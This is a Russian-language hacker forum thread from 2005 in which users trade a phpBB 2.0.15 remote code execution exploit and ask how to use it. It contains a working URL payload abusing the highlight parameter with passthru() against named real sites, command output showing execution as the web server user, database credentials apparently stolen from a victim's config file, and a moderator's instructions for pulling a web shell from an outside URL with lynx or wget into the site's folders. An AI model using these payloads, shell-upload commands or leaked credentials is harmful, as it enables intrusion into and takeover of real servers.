Форумы Эксплоит для phpbb 2.0.15

Discussion in 'Уязвимости CMS/форумов' started by KLez, 30 Jun 2005.

  1. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,125
    Likes Received:
    819
    Reputations:
    97
    Попробуй другой топик открыть
     
  2. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,125
    Likes Received:
    819
    Reputations:
    97
    На некоторых форумах выдаётся вот такая штука!!!
    Fatal error: Call to undefined function phpbb_rtrim() in /pub/home/motorolk/motor/forum/viewtopic.php on line 498

    Чё это такое?
     
  3. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,125
    Likes Received:
    819
    Reputations:
    97
    http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'

    А чё дальше то делать?

    Как шелл залить в форум ??? :confused:
     
    #23 dinar_007, 3 Jul 2005
    Last edited: 3 Jul 2005
  4. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    87
    Likes Received:
    2
    Reputations:
    0
    $dbms = 'mysql';

    $dbhost = 'localhost';
    $dbname = 'blend129_form';
    $dbuser = 'blend129_form';
    $dbpasswd = '109033';
     
  5. S1on

    S1on New Member

    Joined:
    1 Jul 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Подскажите плиз, как спомощью вот этого (http://target/forum/viewtopic.php?t=536&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).')
    можно залить файлы на сервак ?
     
  6. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,074
    Likes Received:
    1,533
    Reputations:
    1,126
    Ну есть масса способов..
    можешь через exec() залить..
    но проще узнать сначала БД (в файле конфига). Может логин и пасс и для фтп подойдут).
     
  7. S1on

    S1on New Member

    Joined:
    1 Jul 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Rebz, приведи для начинающих пример этой команды плизз
     
  8. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,074
    Likes Received:
    1,533
    Reputations:
    1,126
    Я немного не в ту степь пошёл.. =)
    Попробуй wget-ом.. если он не поддерживается, то можно lynx-ом.
    Синаксис такой:

    lynx -source http://здесь_урл_шелла/shell.php>>1.php
    после знака >> мы вводим название, которое будет на сайте служить вам шеллом. Также можно сразу указать др.путь, например, .... >>./images/1.php (ваш шелл будет записан в папку images).
    Ну и т.д. по аналогии...
     
  9. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    как его открыть подробнее пожалуйста напиши.
     
  10. -artik-

    -artik- Banned

    Joined:
    13 Jun 2005
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    Я тут новенький. У меня возникли вопросы что делать после того как я узнал пароль
    к БД? и еще - эта уязвимость только к phpbb 2.0.15? (к прешедствующим версиям не идет?)
     
  11. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    www.[target].ru/viewtopic.php?t=4&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'&cmd=id
    выдает:

    uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500что

    дальше делать подскажите, Плизз
     
  12. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    Команды Unix выучи потом поймешь =))).
     
  13. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    Я даже видео снял вот что то его не публикуют =((((.
     
  14. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,610
    Likes Received:
    1,410
    Reputations:
    611
    и правильно что не публикуют, Кез, молодец -)) не нужно там пол инета хакнутого... пройдет время и можно буит =)
     
  15. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    Ну в чём то ты прав а в чём то нет. Пусть другой форум ставят о не этот с уязвимостью.
     
  16. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    SanyaX, скинь на webfile.ru потом даш мне код =)) :D
     
  17. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    На главной странице где коментарии там есть ссылка на експлойт с расширением php.
     
  18. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    SanyaX, я имел виду видео который ты снял...
     
  19. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    не знаю как отрагирует администрация от этого.
     
  20. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    SanyaX, у тя типа получилось =))
     
Loading...